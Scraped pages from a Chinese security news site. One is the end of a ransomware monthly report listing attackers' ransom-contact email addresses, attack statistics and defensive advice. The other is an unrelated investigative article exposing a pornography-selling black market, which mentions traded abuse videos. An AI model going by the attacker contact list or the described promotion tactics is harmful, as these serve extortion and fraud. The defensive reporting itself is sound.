kurosaki_ichigo@tutanota.com

lebron@nuke.africa

nobad@tutamail.com

Suzumiya_Haruhi@tutanota.com

backtonormal@foxmail.com

paydecryption@qq.com

decoder-help@protonmail.com

decrypt@fros.cc

techn@airmail1.cc

helpersmasters@airmail.cc

helponlinesupport@airmail1.cc

vsokaitis@aol.com

minotaur0428blaze.it

broodmother@cock.li

heinonenfornoff@aol.com

garrantydecrypt@airmail.cc

bitpandacom@qq.com

bitencrypt@cock.li

cyrill.fedor0v@yandex.com

claymore@airmail.cc

raclawtravier@aol.com

altdelete@cock.li.district

unlock@cock.li

travolta_john@aol4.com

bakfiles@protonmail.com

travolta_john@aol2.com

fastsupport@airmail1.cc

decriptscrabber@mail.ru

Helip@protonmail.com

crypted_okumura@firemail

trinskert@bk.ru

travolta_john@aol1.com

heinonenfornoff@aol.com

ctrlalt@cock.li

catherwood.judd@aol.com

files.recovery@foxmail.com

nikolatesla@cock.li

SabinaSciubba@protonmail.com

deasonpennapati@aol.com

zero@hook.work

eadmundcoutts@aol.com

brbrcodes@gmail.com

syndicateXXX@aol.com

footballprom@tuta.io

badbusiness@tutanota.de

GetDataBack@fros.cc

yourway@cock.li

garrantydecrypt@airmail.cc

old@nuke.africa

asdqwezxc@cock.li

BM-2cWdhn4f5UyMvruDBGs5bK77NsCFALMJkR@bitmessage.ch

rsupp@protonmail.ch

表2. 黑客邮箱

防护数据
从被攻击系统分布图看,被攻击的服务器系统版本中Windows server 2003占比最高,其次是Windows 2008,再是Windows server 2012。建议用户不要在使用停止支持的操作系统,更新到新版操作系统,能够提供更好的安全保护。

图13. 10月被攻击系统分布

以下是根据10月份被攻击IP采样制作的被攻击地域分布图,和之前几个月采集到的进行对比,地区的排名和占比差别都不大。信息产业发达的地区仍是被攻击的主要对象。

图14. 10月被攻击地区分布图

通过10月份和9月份的弱口令攻击趋势对比可以发现,针对RDP进行攻击的量在上升:在9月份最高一天攻击次数为400多万次,在10月份最高一天为600多万近700万次。而针对mysql进行攻击量有明显降低:在9月份最高一天有近2000万次,在10月份最高的一天只有100多万次。

图15. 攻击类型趋势图

总结
针对服务器的勒索病毒攻击已经成为当下勒索病毒的一个主要方向,企业也需要将强自身的信息安全管理能力,尤其是弱口令,漏洞,文件共享和远程桌面的管理,以应对勒索病毒的威胁,再次我们给各位管理员一些建议:

多台机器,不要使用相同的账号和口令,口令要有足够的长度和复杂性,并定期更换登录口令;
重要资料应设置访问权限控制,并做好备份工作;
关闭非必要的服务与端口,定期检测系统和软件中的安全更新,及时打上补丁;
服务器应安装专业安全防护软件,定期检查服务器安全运行情况(包括账户情况,windows日志,安全软件日志),在发现异常后第一时间进行处理。
本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/163745
安全客 – 有思想的安全新媒体
恶意软件 勒索软件 安全报告

360安全卫士 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录
2019-02-23 19:55:32

WordPress 5.0 RCE 详细分析
2019-02-22 16:45:18

某php开源cms有趣的二次注入
2019-02-22 16:30:08

三层网络靶场搭建&MSF内网渗透
2019-02-22 14:30:46
|发表评论
发表你的评论吧
昵称
你全家都是黑客
换一个
|评论列表
加载更多
360安全卫士
360安全卫士安全客官方账号
文章
203
粉丝
27
TA的文章
盗号木马疯狂窃取游戏币,竟还利用搜索引擎打广告?
2019-02-21 17:27:44
2018年Windows服务器挖矿木马总结报告
2019-02-09 15:30:44
大吉大利放心吃鸡:盗取Steam游戏密码的最新木马披露
2019-02-02 21:02:36
鑫哥木马劫持超60家网吧及9所大学的电脑
2019-01-25 17:53:50
警惕GarrantyDecrypt勒索病毒最新变种NOSTRO加密全部文件
2019-01-16 18:40:37
输入关键字搜索内容
相关文章
事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录
预警 | 部分云上用户中招 watchdogs 感染性挖矿病毒
Pony Loader窃密木马样本分析
盗号木马疯狂窃取游戏币,竟还利用搜索引擎打广告?
Lucky双平台勒索者解密分析
Criakl勒索病毒分析简要
1月政企终端安全态势分析报告
热门推荐
文章目录
感染数据分析
勒索病毒最新情报
黑客信息
防护数据
总结
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 0daybank

v看

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
+V看片后,才发现她们戏真多
阅读量 91664 | 评论 11

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-08-07 14:36:31
我承认,我确实+V看片了,但我一定要在这里双手打字以证清白,这件事要怪的话不能怪我,只能怪她们戏太多。

时间回到上个月底的中午,刚吃完午饭的我正躺在床上犯困,放在床头柜的手机震动了起来,打开一看,是一特爱八卦的朋友给我发的一段聊天截图。聊天内容很劲爆——女子(我们称为小红)和多名男子在KTV同时发生性关系后被男友(称为小黑)发现,男子愤怒的和女友提出分手并支付了“分手费”。

https://p4.ssl.qhimg.com/t0183bfa8cb30a160cf.jpg

当时的我不仅内心毫无波澜甚至还有点小性兴奋,便回复疑问三连“在哪看的?有视频吗?是明星吗?”

“不是什么公众人物,小黑被同时带多顶绿帽子才是关键,而且被这样公之于众,在微博上已经是热门事件了,我就是在刷微博的时候看到的。最关键的是这段视频还被拍了下来,你随便搜下聊天截图中这两个人的名字就能搜到。”

根据聊天截图中的名字,我在微博上对小红进行了搜索,然后第一个就看到了这样的搜索结果。

https://p4.ssl.qhimg.com/t01663df67a9c1283af.jpg

整篇微博将所有的关注点都引导到了“加V看片”上,这个套路怎么感觉有点熟悉?无论是各种社交软件还是手游端游、直播,都能看到这种卖片的牛皮癣广告。

https://p2.ssl.qhimg.com/t019576becd1d8cd1ca.png

众多社交软件

https://p0.ssl.qhimg.com/t01049f7b103aaabe05.jpg

DOTA2等游戏公频

或许是博主怕直接放视频被封? 在加上微信后,嗯~不一样的剧情,熟悉的套路。果然是让我+V买片的。但搜索微博热点事件为什么也会出现这种小广告呢?事出反常必有妖,这个热点事件似乎没有看起来的那么简单。

一场楚门秀?
在百度搜索小红名字后,出现了很多相关消息的搜索结果,其中相关帖子的排名很靠前,点进去后发现又是通过这个热点事件去+V卖片的,她们就这么喜欢贴色情新闻吗?这样一看,卖片的反而成为了整个热点事件最后的受益者。虽然这个事件有很多爆点,但不是公众人物的话不应有如此广泛的传播。

如果卖片的是整个事件最终的受益者,那我们不妨大胆猜想下,这个热点事件就是她们刻意营造的。在浏览过多条新闻后,我终于发现了一个疑点,就是在不同论坛和新闻中,聊天记录虽然一样,但对话人的头像却不一样。

https://p4.ssl.qhimg.com/t016e0fc032bfc3e53c.jpg

仔细研究聊天对话内容后,我进一步证实了聊天记录是伪造的观点:

1.小红和小黑的聊天内容表示只有两男两女,但在短短6秒的视频内容中出现了至少四男一女(不算拍摄的)

2.聊天截图中的图片与视频内容不一致

3.在拨打聊天记录中的手机号后,语音提示是空号

在后续的探索中,我还发现这个视频早在大半年前就出现在了国外的色情社区里,而为什么偏偏在大半年后这个事件才会开始如此广泛的传播呢?如果整个事件是虚假伪造的,那营造整个事件的幕后推手是否就是最终受益的“+V看片”产业呢?这些疑问就像夏天阴沉的雷云,沉闷的笼罩在心头让我烦躁不安。如果我们每天看到的热点事件都参杂着被恶意伪造的新闻,真正的推手却在幕后受益,那我们不就是活在虚假世界中的楚门吗?

“她们”戏真足
此时的我早已睡意全无,就回实验室和我们“一号技师”谈起了这件事。坐在角落的老技师默默听完后邪魅一笑,“要搞清楚吗?”我问,“怎么搞?”“要想摧毁敌人,必先了解敌人。你多加点卖片的号试试,看她们有没有在招收二级代理的,尝试潜入敌军内部,搞清楚她们的产业链条”。在+V的过程中,我看到了这样一个普遍存在的套路,“此号已满,请加V信 XXXXX”当时我已心中起疑,真的有这么多人加V买片吗?5000人上限的微信号这么快就满了?后来我才知道这是她们给自己加的一场戏,先往下看。

https://p3.ssl.qhimg.com/t01a6f7c45e13b1bf6a.jpg

在我添加众多微信后,发现她们真的是戏精专业毕业的。刚开始她们业务很熟练,会主动和你聊天,然后发你“小红出轨”的小视频,让你尝点甜头,在看过后和你推荐她们的“成套”业务。

https://p2.ssl.qhimg.com/t0192acfc4f693cc491.jpg

她们会向你承诺,一旦付款,视频内容在线秒发,这些视频的价格大致在20-300元左右,通过一些云盘账号或者在线网址来发送。果然如“一号技师”所说,其中一些人是招收代理的。刚开始加的一些招二级代理的人,会要求我先支付300元左右的代理费,然后可以花很低的价格和她长期大量买片,或者把我拉入一个QQ群内,通过和群主付款来拿“货”。但这样的结果是,我始终是一个“小喽啰”,抓不到她们的“幕后老大”和“供货渠道”。通过多番探索,我终于找到了一个知道些行情内幕的“小头目”。“小头目”看我很“上道”,承诺在支付400元的“会费”后可以直接和QQ机器人以0.3元的价格提取片源。在支付“会费”后,我成功潜入敌人内部展开“卧底”工作。

https://p3.ssl.qhimg.com/t010c5b47be13ec646d.jpg

群内是禁止交流的,在“小头目”指点下,我明白了整个货源的提取方式。在群内首先和QQ机器人进行私聊,随后根据提示进行操作,交易成功后机器人会生成一个云盘账号发给我。

https://p1.ssl.qhimg.com/t01ecc639660b4a15c1.jpg

“小头目”她看我成功完成了交易,和我说“你现在几乎可以零成本的提货了,但自己去卖的话效率很低的,我这里有套1对1的推广教学要不要了解下,只卖你一千,学会后没几天你就回本了”。细思极恐,她原来在这里等我呢,真的是步步为营,小金人你不拿都没人敢动。本人动用多年的聊天技巧,在没有支付一分钱的情况下把她们的推广流程搞的明明白白,现在以微博推广为例,汇总成“戏精成长手册”,将整个推广过程曝光出来:

1.发布微博

首先用一个加V微博发布内容,微博内容包含搜索时输入的敏感词汇,或者和花边新闻相关(上面我们提到的小红小黑事件)

2.刷量

之后通过刷量将点赞、转发数提高到一个量级,并根据搜索输入框内的敏感关键词进行微博搜索推广上的优化。这样的话微博用户在搜索这个敏感关键词时,就能看到这条微博是展示在第一位了。刷量通常有两种常规手段,比较低级的一种是通过“转发+点赞可以免费看片”这样的话术来进行推广,另一种是通过软件群控小号来进行刷量操作。

3.引流

通过多个关键词的热门推荐,“卖片”者已经拥有了高量IP,并且搜索这些敏感词汇的人群基本都是她们的“目标受众”,她们通常通过微博内容和评论区两个地方来引导人们+V

4.转化

她们通常会创建两个以上的简短微信号,并且在买片者加第一个微信的时候提示此号已满。经我们“1号技师”分析,原因主要有三点:①人们首先添加的微信号类似于高流量IP接入端口,第一个微信号不添加任何好友,避免投入高成本宣传的微信号被举报查封;②营造交易量很大的假象,便于接收二级代理和做生意;③简短的微信号在微信名称上和宣传图片中都能完整展示出来。

之后就是通过聊天来进行卖片和招收二级代理了。

幕后老大
调查到现在,整个“+V卖片”产业链唯一存有疑云的是“幕后老大”究竟通过怎样的渠道来获取小黄片?

依旧靠本人多年的聊天技巧,我先与之前加入的QQ群主取得联系后,以“有笔大买卖”为借口和真正的“幕后老大”取得了联系。

https://p5.ssl.qhimg.com/t0145917f39cba8c3b5.png

当我和群主多次沟通后,她始终不愿意向我透露这些小黄片是通过什么渠道获取的,并且不愿意出售QQ机器人的管理权,她对于产业链条的“命根子话题”极为敏感和谨慎。

在我一筹莫展时,还得靠我们的“一号技师”出手帮忙。(这里不再不赘述复杂的技术过程)

在一番花式操作后我们发现,这个群主其实在背后操纵着8000台以上的QQ机器人,并且她的业务也不只是卖片,还包括需要充值会员的色情直播平台等等。同时+V看片“幕后老大”的片子主要来源于各种色情社区和网站,“幕后老大”应该有属于自己的“爬虫”软件去爬每日更新的色情片。

https://p2.ssl.qhimg.com/t012cc2980931c96fac.png

我简单画了一个结构示意图,将整个产业链条曝光出来,包括供片渠道、组织结构、盈利方式、推广模式等等。

https://p5.ssl.qhimg.com/t015dfd14ad1bb29f8c.png

在这些被倒卖的片子中,有很多片子都包含了:强奸、性侵儿童、偷窥、乱伦等众多违背道德与违反法律的视频。

https://p0.ssl.qhimg.com/t01c7721b1726757330.jpg

这让我想起一份显示中国性侵现状的报告,其中有超七成熟人作案,亲生父亲性侵儿女数量更是超出想象,同时在上个月,有大量公众人物的性侵丑闻被接连曝光。这让人不禁猜想,除了这些已被曝光的,又有多少人选择默默承受或无处发声。

正是这些被倒卖的片子,在为滋养性侵的腐烂土壤提供肥料,有多少未成年人会被视频内容影响我们不得而知。但在探索过程中,让人万万想不到的是,这些二级代理的卖片者中很多都是学生,他们通过倒卖黄片来赚取生活费或者零用钱。

有个卖片的小孩问我“哥哥,我只是用暑假时间卖点小资源而已,你会不会很讨厌这种行为呀?”说实话,我的心都是痛的,我从未想过我们欲要保护的未成年人竟然也是加微看片背后的推手,一切描述情感的词语用在此时都开始显得苍白无力。

https://p2.ssl.qhimg.com/t01aa48eb860c5e18d8.jpg

开枪
至此为止,整个深埋地下的“+V卖片“产业帝国已被挖出并暴晒在了日光下,我担心这些已经被我们曝光的黑产,但更让我心寒胆战的是这露出一角下的整座冰山。这整个产业链条背后还牵扯了众多与色情行业相关的灰黑产业利益链条,但无论如何,我们已将自己目前探索到的曝光出来。

这篇文章是我们冲着庞大黑产帝国开响的第一枪,接下来还会有第二枪、第三枪。只要黑产不止,我们便枪声不息。

关注“安全客”微信公众号,倾听有思想的安全声音。

本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/154303
安全客 – 有思想的安全新媒体
黑产 原创文章

全村人的希望 官方小编 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录
2019-02-23 19:55:32

WordPress 5.0 RCE 详细分析
2019-02-22 16:45:18

某php开源cms有趣的二次注入
2019-02-22 16:30:08

三层网络靶场搭建&MSF内网渗透
2019-02-22 14:30:46
|发表评论
发表你的评论吧
昵称
大表哥
换一个
|评论列表
360U164281868 · 2018-08-17 17:41:32 回复
楼下的不都是心中无码的大神吗

sssssss · 2018-08-09 15:21:32 2 回复
那些都不重要,我就是想你知道你多年的聊天技巧

张希源 · 2018-08-08 12:13:02 1 回复
内容不错,就是包含非法图片,举报举报

杨教授 · 2018-08-08 10:43:26 回复
点个赞

我不是黑客 · 2018-08-07 15:07:54 1 回复
等我赚钱了一定买个能看清图片的眼镜

全村人的希望 · 本文作者 · 2018-08-07 15:28:06 1 回复
独秀,你的凳子呢?快坐下

带头大哥 · 2018-08-07 14:55:04 2 回复
虽然你打了码 但我心中无码

全村人的希望 · 本文作者 · 2018-08-07 15:27:24 1 回复
酒肉穿肠过,佛祖心中留?

Anonymous · 2018-08-07 14:54:18 回复
你又动了谁的巧克力蛋糕 skr~

教主 · 2018-08-07 14:45:43 2 回复
散心病狂,竟然打码

你全家都是黑客 · 2018-08-07 14:39:03 3 回复
封面图太黄了 举报了

全村人的希望
咋回事儿呢 小老弟
文章
78
粉丝
16
TA的文章
360企业安全集团 | 招募安全人才
2019-02-15 18:00:01
安全客2018季刊第四季 | 重新定义智能时代的“IoT安全”
2019-01-31 11:04:59
安全客祝您猪事大吉,双倍稿费红包陪你开心过年!
2019-01-30 11:16:06
中奖名单公布 | 2018安全客年终大调查,最懂我的还是你!
2019-01-25 18:03:26
360网络安全周报第194期
2019-01-18 11:27:53
输入关键字搜索内容
相关文章
黑产大数据——在线视频流量欺诈黑灰产研究报告
起底游戏、会员代充背后的洗钱之术,你可能是“帮凶”
实锤案分享 攻防骚对抗 | 黑产挖矿的路子居然这么野了?
安全报告 | 2018年游戏行业安全监测报告及五大攻击趋势
“安全大脑”透视“芯片门”,支招应对未来芯片黑产
涉嫌偷渡拐卖人口?我不是,我没有,别瞎说
互联网黑灰产工具软件安全报告:2018年度半年报告
热门推荐
文章目录
一场楚门秀?
“她们”戏真足
幕后老大
开枪
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…

0daybank